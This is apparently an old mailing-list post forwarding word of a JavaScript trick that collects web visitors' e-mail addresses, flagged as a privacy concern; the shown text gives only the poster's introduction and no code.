JavaScript to grab e-mail <explained> (fwd)

This is something that i had not seen posted here as of yet.  (Sorry if it
has.  My mail feed has been suffering from altzheimers as of late and
getting progressivly worse...)

Crypto Relevance:  None
Privacy Relevance: Lots

This was forwarded to me by the "CGI Guy" at Teleport.  I had heard this was
possible.  I was quite surprised to find just how *easy* this is!  I can see
a number of creative (and scary) uses for this little hack.  (This makes
JavaScript seem more like a coffee enema.)